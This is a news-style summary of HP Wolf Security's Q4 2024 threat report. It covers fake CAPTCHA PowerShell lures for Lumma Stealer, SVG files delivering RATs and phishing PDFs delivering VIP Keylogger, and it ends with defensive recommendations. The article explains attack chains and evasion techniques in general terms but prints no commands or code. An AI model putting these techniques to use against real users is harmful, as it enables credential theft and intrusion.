From fake CAPTCHAs to malware PDFs: The biggest cybersecurity risks right now

Cybercriminals are deploying increasingly sophisticated tactics to bypass traditional security measures, as revealed in HP Wolf Security‘s latest Threat Insights Report – March 2025. Covering threats detected in Q4 2024, the report highlights the evolution of malware distribution, the increasing use of social engineering tactics, and the growing reliance on stealthy infection techniques that exploit everyday digital interactions.

The findings indicate a troubling rise in fake CAPTCHA attacks, malicious SVG-based malware delivery, and weaponized PDF files, all designed to infiltrate enterprise systems and steal sensitive data. These emerging threats underscore the need for enhanced endpoint security, particularly as attackers refine their strategies to evade detection by email security gateways, firewalls, and antivirus solutions.

How Are Fake CAPTCHA Attacks Spreading Malware?

One of the most concerning trends in Q4 2024 was the widespread use of fake CAPTCHA challenges to infect users with Lumma Stealer, a type of information-stealing malware capable of exfiltrating passwords, cryptocurrency wallets, and browsing data. Cybercriminals have exploited the familiar CAPTCHA verification process—intended to distinguish human users from bots—to manipulate individuals into unknowingly executing malicious commands.

Victims are often redirected to malicious websites through deceptive advertisements, compromised web pages, or search engine manipulation techniques. On these sites, users are prompted to complete a CAPTCHA verification process, which appears authentic but is actually part of a carefully crafted social engineering campaign.

When users interact with the fake CAPTCHA, a malicious PowerShell command is automatically copied to their clipboard. They are then instructed to open the Windows Run prompt, paste the command, and execute it—unwittingly initiating the malware download. Once activated, the script installs Lumma Stealer, which embeds itself into the system and begins extracting sensitive information.

The attackers’ use of legitimate cloud hosting services to distribute malware further complicates detection. Since many security systems rely on domain reputation to filter malicious sites, leveraging trusted cloud services allows hackers to circumvent these defenses, making fake CAPTCHA attacks increasingly difficult to detect and block.

Why Are Cybercriminals Using SVG Images for Malware Delivery?

HP Wolf Security also identified a significant increase in malware embedded within Scalable Vector Graphics (SVG) files. These script-enabled images, which open by default in web browsers, provide a discreet method for distributing remote access trojans (RATs) and infostealers.

The attack chain begins when a user opens a malicious SVG image received via email, downloaded from the web, or delivered through other channels. The embedded JavaScript then executes hidden commands, enabling the attacker to download additional malware without triggering standard security alerts.

HP Wolf Security observed that seven distinct RATs were deployed using this method in Q4 2024, including DCRat, AsyncRAT, XWorm, and VenomRAT. By distributing multiple strains of malware, cybercriminals ensure redundancy and persistence, increasing the likelihood of a successful infection even if some payloads are detected and removed.

A key feature of this campaign was the use of obfuscated Python scripts to deliver the final malware stage. The growing popularity of Python for AI and data science applications has inadvertently made it an attractive language for cybercriminals. Since Python interpreters are commonly installed on enterprise machines, attackers can use them to execute malware with minimal suspicion.

To evade security detection, these scripts leverage direct system calls, bypassing traditional antivirus monitoring mechanisms. Instead of executing malware through standard Windows APIs—where behavior-based detection tools might flag them—these attacks operate at a lower level within the system, making them harder to intercept.

How Are Attackers Targeting Engineering Firms with Malicious PDFs?

HP Wolf Security also documented a malware campaign using PDF documents to target engineering companies in the Asia-Pacific region. In this attack, cybercriminals disguised malicious PDFs as quotation requests, tailoring their phishing emails based on the recipient’s industry, such as automobile manufacturing and industrial parts supply.

When victims opened these PDF attachments, they were shown a blurred image with instructions claiming that an updated PDF reader was required or that the document had been compressed for security reasons. Clicking the image triggered a file download, which delivered a ZIP archive containing a mounted disk image (IMG) file.

Once executed, this file installed VIP Keylogger, a powerful malware strain designed to record keystrokes, extract saved credentials, and capture clipboard data. The weaponization of PDF documents demonstrates how attackers continue to refine their phishing strategies to maximize credibility and engagement.

Notably, this technique effectively bypasses email security scanners, which often fail to detect threats hidden within multi-layered compression formats like ZIP and IMG files. Since many businesses routinely receive quotation requests via email, the targeted nature of these attacks increases the likelihood of successful infiltration.

What Do These Trends Reveal About the Future of Cybersecurity?

The HP Wolf Security Threat Insights Report highlights an ongoing shift in cybercriminal tactics, as attackers increasingly exploit user psychology, web-based vulnerabilities, and trusted digital services. Several key trends emerge from the findings:

1. Email remains the dominant malware delivery vector, accounting for 53% of all threats blocked by HP Sure Click in Q4 2024. Despite advances in email filtering technologies, attackers continue to circumvent security barriers through well-crafted phishing campaigns.

• Web-based threats are on the rise, with 27% of malware infections originating from browser-based downloads. This underscores the growing need for advanced web security measures to detect and neutralize threats before they reach endpoints.

• Attackers are diversifying malware delivery mechanisms, with compressed archives (32%) and script-based infections (43%) playing a critical role in malware distribution. The continued weaponization of documents, including PDFs and Microsoft Office files, remains a significant challenge for businesses.

Given these evolving threats, cybersecurity experts emphasize the importance of proactive defense measures. HP Wolf Security recommends:

• Disabling clipboard sharing to prevent fake CAPTCHA exploits.
• Restricting access to Windows Run commands to mitigate PowerShell-based infections.
• Strengthening endpoint security through containerized application isolation, ensuring malware remains confined to a virtualized environment.

By adopting multi-layered cybersecurity strategies, organizations can reduce their attack surface and stay ahead of emerging threats. As cybercriminals continue to refine their evasion techniques, businesses must remain vigilant and proactive in safeguarding their digital ecosystems.